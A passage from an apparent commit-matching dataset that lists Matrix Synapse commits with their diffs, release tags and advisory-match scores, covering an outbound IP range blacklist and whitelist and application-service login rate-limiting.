class ContentRepositoryConfig(Config):", - " #url_preview_ip_range_blacklist:", - "- # - '127.0.0.0/8'", - "- # - '10.0.0.0/8'", - "- # - '172.16.0.0/12'", - "- # - '192.168.0.0/16'", - "- # - '100.64.0.0/10'", - "- # - '169.254.0.0/16'", - "- # - '::1/128'", - "- # - 'fe80::/64'", - "- # - 'fc00::/7'", - "+%(ip_range_blacklist)s", - "diff --git a/synapse/config/server.py b/synapse/config/server.py", - "index 85aa49c02..f3815e5ad 100644", - "--- a/synapse/config/server.py", - "+++ b/synapse/config/server.py", - "@@ -25,2 +25,3 @@ import attr", - " import yaml", - "+from netaddr import IPSet", - "@@ -41,2 +42,30 @@ DEFAULT_BIND_ADDRESSES = [\"::\", \"0.0.0.0\"]", - "+DEFAULT_IP_RANGE_BLACKLIST = [", - "+ # Localhost", - "+ \"127.0.0.0/8\",", - "+ # Private networks.", - "+ \"10.0.0.0/8\",", - "+ \"172.16.0.0/12\",", - "+ \"192.168.0.0/16\",", - "+ # Carrier grade NAT.", - "+ \"100.64.0.0/10\",", - "+ # Address registry.", - "+ \"192.0.0.0/24\",", - "+ # Link-local networks.", - "+ \"169.254.0.0/16\",", - "+ # Testing networks.", - "+ \"198.18.0.0/15\",", - "+ \"192.0.2.0/24\",", - "+ \"198.51.100.0/24\",", - "+ \"203.0.113.0/24\",", - "+ # Multicast.", - "+ \"224.0.0.0/4\",", - "+ # Localhost", - "+ \"::1/128\",", - "+ # Link-local addresses.", - "+ \"fe80::/10\",", - "+ # Unique local addresses.", - "+ \"fc00::/7\",", - "+]", - "+", - " DEFAULT_ROOM_VERSION = \"6\"", - "@@ -258,2 +287,34 @@ class ServerConfig(Config):", - "+ ip_range_blacklist = config.get(", - "+ \"ip_range_blacklist\", DEFAULT_IP_RANGE_BLACKLIST", - "+ )", - "+", - "+ # Attempt to create an IPSet from the given ranges", - "+ try:", - "+ self.ip_range_blacklist = IPSet(ip_range_blacklist)", - "+ except Exception as e:", - "+ raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist.\") from e", - "+ # Always blacklist 0.0.0.0, ::", - "+ self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", - "+", - "+ try:", - "+ self.ip_range_whitelist = IPSet(config.get(\"ip_range_whitelist\", ()))", - "+ except Exception as e:", - "+ raise ConfigError(\"Invalid range(s) provided in ip_range_whitelist.\") from e", - "+", - "+ # The federation_ip_range_blacklist is used for backwards-compatibility", - "+ # and only applies to federation and identity servers. If it is not given,", - "+ # default to ip_range_blacklist.", - "+ federation_ip_range_blacklist = config.get(", - "+ \"federation_ip_range_blacklist\", ip_range_blacklist", - "+ )", - "+ try:", - "+ self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)", - "+ except Exception as e:", - "+ raise ConfigError(", - "+ \"Invalid range(s) provided in federation_ip_range_blacklist.\"", - "+ ) from e", - "+ # Always blacklist 0.0.0.0, ::", - "+ self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])", - "+", - " if self.public_baseurl is not None:", - "@@ -563,2 +624,6 @@ class ServerConfig(Config):", - " ):", - "+ ip_range_blacklist = \"\\n\".join(", - "+ \" # - '%s'\" % ip for ip in DEFAULT_IP_RANGE_BLACKLIST", - "+ )", - "+", - " _, bind_port = parse_and_validate_server_name(server_name)", - "@@ -754,2 +819,17 @@ class ServerConfig(Config):", - "+ # Prevent outgoing requests from being sent to the following blacklisted IP address", - "+ # CIDR ranges. If this option is not specified then it defaults to private IP", - "+ # address ranges (see the example below).", - "+ #", - "+ # The blacklist applies to the outbound requests for federation, identity servers,", - "+ # push servers, and for checking key validity for third-party invite events.", - "+ #", - "+ # (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly", - "+ # listed here, since they correspond to unroutable addresses.)", - "+ #", - "+ # This option replaces federation_ip_range_blacklist in Synapse v1.25.0.", - "+ #", - "+ #ip_range_blacklist:", - "+%(ip_range_blacklist)s", - "+", - " # List of ports that Synapse should listen on, their purpose and their", - "diff --git a/synapse/server.py b/synapse/server.py", - "index 9af759626..043810ad3 100644", - "--- a/synapse/server.py", - "+++ b/synapse/server.py", - "@@ -372,3 +372,3 @@ class HomeServer(metaclass=abc.ABCMeta):", - " An HTTP client that uses configured HTTP(S) proxies and blacklists IPs", - "- based on the IP range blacklist.", - "+ based on the IP range blacklist/whitelist.", - " \"\"\"", - "@@ -376,2 +376,3 @@ class HomeServer(metaclass=abc.ABCMeta):", - " self,", - "+ ip_whitelist=self.config.ip_range_whitelist,", - " ip_blacklist=self.config.ip_range_blacklist,", - "diff --git a/tests/replication/test_multi_media_repo.py b/tests/replication/test_multi_media_repo.py", - "index 48b574ccb..83afd9fd2 100644", - "--- a/tests/replication/test_multi_media_repo.py", - "+++ b/tests/replication/test_multi_media_repo.py", - "@@ -50,3 +50,3 @@ class MediaRepoShardTestCase(BaseMultiWorkerStreamTestCase):", - "- self.reactor.lookups[\"example.com\"] = \"127.0.0.2\"", - "+ self.reactor.lookups[\"example.com\"] = \"1.2.3.4\"" - ], - "changed_files": [ - "changelog.d/8821.bugfix", - "changelog.d/8870.bugfix", - "docs/sample_config.yaml", - "synapse/config/federation.py", - "synapse/config/repository.py", - "synapse/config/server.py", - "synapse/server.py", - "tests/replication/test_multi_media_repo.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8870": "Use an empty ip_range_blacklist to allow connecting to localhost. matrix-org/sytest#987 Fix the sample config location for the ip_range_whitelist setting. #8954 don't apply blacklist to proxy connections #9084 Convert blacklisted IPv4 addresses to compatible IPv6 addresses. #9240" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_IS_SECURITY_RELEVANT", - "message": "", - "relevance": 32 - }, - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8870, 8870", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: setting", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server, federation", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8870", - "relevance": 2 - } - ] - }, - { - "commit_id": "44b7d4c6d6d5e8d78bd0154b407defea4a35aebd", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608147647, - "hunks": 5, - "message": "Fix the sample config location for the ip_range_whitelist setting. (#8954) Move it from the federation section to the server section to match ip_range_blacklist.", - "diff": [ - "diff --git a/changelog.d/8954.feature b/changelog.d/8954.feature", - "new file mode 100644", - "index 000000000..39f53174a", - "--- /dev/null", - "+++ b/changelog.d/8954.feature", - "@@ -0,0 +1 @@", - "+Apply an IP range blacklist to push and key revocation requests.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index f196781c1..75a01094d 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -175,2 +175,14 @@ pid_file: DATADIR/homeserver.pid", - "+# List of IP address CIDR ranges that should be allowed for federation,", - "+# identity servers, push servers, and for checking key validity for", - "+# third-party invite events. This is useful for specifying exceptions to", - "+# wide-ranging blacklisted target IP ranges - e.g. for communication with", - "+# a push server only visible in your network.", - "+#", - "+# This whitelist overrides ip_range_blacklist and defaults to an empty", - "+# list.", - "+#", - "+#ip_range_whitelist:", - "+# - '192.168.1.1'", - "+", - " # List of ports that Synapse should listen on, their purpose and their", - "@@ -673,14 +685,2 @@ acme:", - "-# List of IP address CIDR ranges that should be allowed for federation,", - "-# identity servers, push servers, and for checking key validity for", - "-# third-party invite events. This is useful for specifying exceptions to", - "-# wide-ranging blacklisted target IP ranges - e.g. for communication with", - "-# a push server only visible in your network.", - "-#", - "-# This whitelist overrides ip_range_blacklist and defaults to an empty", - "-# list.", - "-#", - "-#ip_range_whitelist:", - "-# - '192.168.1.1'", - "-", - " # Report prometheus metrics on the age of PDUs being sent to and received from", - "diff --git a/synapse/config/federation.py b/synapse/config/federation.py", - "index a03a419e2..9f3c57e6a 100644", - "--- a/synapse/config/federation.py", - "+++ b/synapse/config/federation.py", - "@@ -58,14 +58,2 @@ class FederationConfig(Config):", - "- # List of IP address CIDR ranges that should be allowed for federation,", - "- # identity servers, push servers, and for checking key validity for", - "- # third-party invite events. This is useful for specifying exceptions to", - "- # wide-ranging blacklisted target IP ranges - e.g. for communication with", - "- # a push server only visible in your network.", - "- #", - "- # This whitelist overrides ip_range_blacklist and defaults to an empty", - "- # list.", - "- #", - "- #ip_range_whitelist:", - "- # - '192.168.1.1'", - "-", - " # Report prometheus metrics on the age of PDUs being sent to and received from", - "diff --git a/synapse/config/server.py b/synapse/config/server.py", - "index f3815e5ad..7242a4aa8 100644", - "--- a/synapse/config/server.py", - "+++ b/synapse/config/server.py", - "@@ -834,2 +834,14 @@ class ServerConfig(Config):", - "+ # List of IP address CIDR ranges that should be allowed for federation,", - "+ # identity servers, push servers, and for checking key validity for", - "+ # third-party invite events. This is useful for specifying exceptions to", - "+ # wide-ranging blacklisted target IP ranges - e.g. for communication with", - "+ # a push server only visible in your network.", - "+ #", - "+ # This whitelist overrides ip_range_blacklist and defaults to an empty", - "+ # list.", - "+ #", - "+ #ip_range_whitelist:", - "+ # - '192.168.1.1'", - "+", - " # List of ports that Synapse should listen on, their purpose and their" - ], - "changed_files": [ - "changelog.d/8954.feature", - "docs/sample_config.yaml", - "synapse/config/federation.py", - "synapse/config/server.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8954": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "COMMIT_IS_SECURITY_RELEVANT", - "message": "", - "relevance": 32 - }, - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8954, 8954", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: server, setting, federation", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server, federation", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8954", - "relevance": 2 - } - ] - }, - { - "commit_id": "a8eceb01e59fcbddcea7d19031ed2392772e6d66", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607704411, - "hunks": 20, - "message": "Honour AS ratelimit settings for /login requests (#8920) Fixes #8846.", - "diff": [ - "diff --git a/changelog.d/8920.bugfix b/changelog.d/8920.bugfix", - "new file mode 100644", - "index 000000000..abcf186bd", - "--- /dev/null", - "+++ b/changelog.d/8920.bugfix", - "@@ -0,0 +1 @@", - "+Fix login API to not ratelimit application services that have ratelimiting disabled.", - "diff --git a/synapse/api/auth.py b/synapse/api/auth.py", - "index bfcaf68b2..1951f6e17 100644", - "--- a/synapse/api/auth.py", - "+++ b/synapse/api/auth.py", - "@@ -33,3 +33,5 @@ from synapse.api.errors import (", - " from synapse.api.room_versions import KNOWN_ROOM_VERSIONS", - "+from synapse.appservice import ApplicationService", - " from synapse.events import EventBase", - "+from synapse.http.site import SynapseRequest", - " from synapse.logging import opentracing as opentracing", - "@@ -476,3 +478,3 @@ class Auth:", - "- def get_appservice_by_req(self, request):", - "+ def get_appservice_by_req(self, request: SynapseRequest) -> ApplicationService:", - " token = self.get_access_token_from_request(request)", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index afae6d327..62f98dabc 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -24,2 +24,3 @@ from typing import (", - " Any,", - "+ Awaitable,", - " Callable,", - "@@ -863,3 +864,3 @@ class AuthHandler(BaseHandler):", - " self, login_submission: Dict[str, Any], ratelimit: bool = False,", - "- ) -> Tuple[str, Optional[Callable[[Dict[str, str]], None]]]:", - "+ ) -> Tuple[str, Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", - " \"\"\"Authenticates the user for the /login API", - "@@ -1006,3 +1007,3 @@ class AuthHandler(BaseHandler):", - " self, username: str, login_submission: Dict[str, Any],", - "- ) -> Tuple[str, Optional[Callable[[Dict[str, str]], None]]]:", - "+ ) -> Tuple[str, Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", - " \"\"\"Helper for validate_login", - "@@ -1084,3 +1085,3 @@ class AuthHandler(BaseHandler):", - " self, medium: str, address: str, password: str", - "- ) -> Tuple[Optional[str], Optional[Callable[[Dict[str, str]], None]]]:", - "+ ) -> Tuple[Optional[str], Optional[Callable[[Dict[str, str]], Awaitable[None]]]]:", - " \"\"\"Check if a password provider is able to validate a thirdparty login", - "diff --git a/synapse/rest/client/v1/login.py b/synapse/rest/client/v1/login.py", - "index d7ae14821..5f4c6703d 100644", - "--- a/synapse/rest/client/v1/login.py", - "+++ b/synapse/rest/client/v1/login.py", - "@@ -16,3 +16,3 @@", - " import logging", - "-from typing import Awaitable, Callable, Dict, Optional", - "+from typing import TYPE_CHECKING, Awaitable, Callable, Dict, Optional", - "@@ -32,2 +32,5 @@ from synapse.types import JsonDict, UserID", - "+if TYPE_CHECKING:", - "+ from synapse.server import HomeServer", - "+", - " logger = logging.getLogger(__name__)", - "@@ -44,3 +47,3 @@ class LoginRestServlet(RestServlet):", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " super().__init__()", - "@@ -107,4 +110,2 @@ class LoginRestServlet(RestServlet):", - " async def on_POST(self, request: SynapseRequest):", - "- self._address_ratelimiter.ratelimit(request.getClientIP())", - "-", - " login_submission = parse_json_object_from_request(request)", - "@@ -114,2 +115,6 @@ class LoginRestServlet(RestServlet):", - " appservice = self.auth.get_appservice_by_req(request)", - "+", - "+ if appservice.is_rate_limited():", - "+ self._address_ratelimiter.ratelimit(request.getClientIP())", - "+", - " result = await self._do_appservice_login(login_submission, appservice)", - "@@ -119,6 +124,9 @@ class LoginRestServlet(RestServlet):", - " ):", - "+ self._address_ratelimiter.ratelimit(request.getClientIP())", - " result = await self._do_jwt_login(login_submission)", - " elif login_submission[\"type\"] == LoginRestServlet.TOKEN_TYPE:", - "+ self._address_ratelimiter.ratelimit(request.getClientIP())", - " result = await self._do_token_login(login_submission)", - " else:", - "+ self._address_ratelimiter.ratelimit(request.getClientIP())", - " result = await self._do_other_login(login_submission)", - "@@ -161,3 +169,5 @@ class LoginRestServlet(RestServlet):", - "- return await self._complete_login(qualified_user_id, login_submission)", - "+ return await self._complete_login(", - "+ qualified_user_id, login_submission, ratelimit=appservice.is_rate_limited()", - "+ )", - "@@ -196,2 +206,3 @@ class LoginRestServlet(RestServlet):", - " create_non_existent_users: bool = False,", - "+ ratelimit: bool = True,", - " ) -> Dict[str, str]:", - "@@ -210,2 +221,3 @@ class LoginRestServlet(RestServlet):", - " exist. Defaults to False.", - "+ ratelimit: Whether to ratelimit the login request.", - "@@ -218,3 +230,4 @@ class LoginRestServlet(RestServlet):", - " # necessarily know the user before now.", - "- self._account_ratelimiter.ratelimit(user_id.lower())", - "+ if ratelimit:", - "+ self._account_ratelimiter.ratelimit(user_id.lower())" - ], - "changed_files": [ - "changelog.d/8920.bugfix", - "synapse/api/auth.py", - "synapse/handlers/auth.py", - "synapse/rest/client/v1/login.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8920": "", - "8846": "Honour AS ratelimit settings for /login requests #8920" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - 